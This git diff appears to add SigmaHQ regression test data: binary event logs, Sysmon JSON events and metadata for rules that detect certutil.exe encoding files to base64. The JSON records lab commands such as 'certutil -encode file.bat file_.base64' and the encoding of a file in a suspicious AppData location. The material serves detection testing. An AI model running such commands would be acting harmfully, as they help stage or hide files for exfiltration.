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 XBMRRJ#n(LM){EDotu^vdAd~+GRacpH literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.json b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.json new file mode 100644 index 000000000..e27376def --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:04:22.017117Z" + } + }, + "EventRecordID": 11570013, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:04:22.010", + "ProcessGuid": "5AA13A44-0316-68FD-8535-000000004002", + "ProcessId": 3980, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil -encode file.bat file_.base64", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/info.yml new file mode 100644 index 000000000..e9c14e662 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/info.yml @@ -0,0 +1,13 @@ +id: 7033fe69-1fd7-4da2-b525-222c1b087107 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: ea0cdc3e-2239-4f26-a947-4e8f8224e464 + title: Suspicious File Encoded To Base64 Via Certutil.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions/ea0cdc3e-2239-4f26-a947-4e8f8224e464.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.evtx new file mode 100644 index 0000000000000000000000000000000000000000..25f49180b9aeef49419defb3e346bfe3c5119628 GIT binary patch literal 69632 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 literal 0 HcmV?d00001 diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.json b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.json new file mode 100644 index 000000000..2b673ca59 --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.json @@ -0,0 +1,66 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 1, + "Version": 5, + "Level": 4, + "Task": 1, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T17:05:11.334152Z" + } + }, + "EventRecordID": 11585346, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-25 17:05:11.327", + "ProcessGuid": "5AA13A44-0347-68FD-8B35-000000004002", + "ProcessId": 6780, + "Image": "C:\\Windows\\System32\\certutil.exe", + "FileVersion": "10.0.20348.4163 (WinBuild.160101.0800)", + "Description": "CertUtil.exe", + "Product": "Microsoft® Windows® Operating System", + "Company": "Microsoft Corporation", + "OriginalFileName": "CertUtil.exe", + "CommandLine": "certutil -encode C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Network\\sr011.xml C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Network\\conv.xml", + "CurrentDirectory": "C:\\Users\\Administrator\\Downloads\\", + "User": "ATTACKRANGE\\Administrator", + "LogonGuid": "5AA13A44-568F-68FB-E39A-520000000000", + "LogonId": "0x529ae3", + "TerminalSessionId": 2, + "IntegrityLevel": "High", + "Hashes": "SHA1=317E563BFC7EC87B181D5A1745E43B8F5288DBFC,MD5=A561A96624CA5CD5491BFC1609E2958A,SHA256=D5B7E8E44F37B1FBD79A79E3321244EEF946F419151374BD1BE4D6833754FED8,IMPHASH=02CB6949ACFAA0B84149D99111C16734", + "ParentProcessGuid": "5AA13A44-0FEC-68FC-281E-000000004002", + "ParentProcessId": 6304, + "ParentImage": "C:\\Windows\\System32\\cmd.exe", + "ParentCommandLine": "\"C:\\Windows\\System32\\cmd.exe\"", + "ParentUser": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/info.yml b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/info.yml new file mode 100644 index 000000000..0d8a289ea --- /dev/null +++ b/regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/info.yml @@ -0,0 +1,13 @@ +id: bfbc8981-818e-4de5-b7a4-1bb3d4a08792 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 82a6714f-4899-4f16-9c1e-9a333544d4c3 + title: File In Suspicious Location Encoded To Base64 Via Certutil.EXE +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/process_creation/proc_creation_win_certutil_encode_susp_location/82a6714f-4899-4f16-9c1e-9a333544d4c3.evtx diff --git a/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.evtx b/regression_data/windows/process_creation/proc_creation_win_certutil_export_pfx/3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5.evtx new file mode 100644 index 0000000000000000000000000000000000000000..71da251ef5906c4c5b3d98006c39210bc5a24173 GIT binary patch literal 69632 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 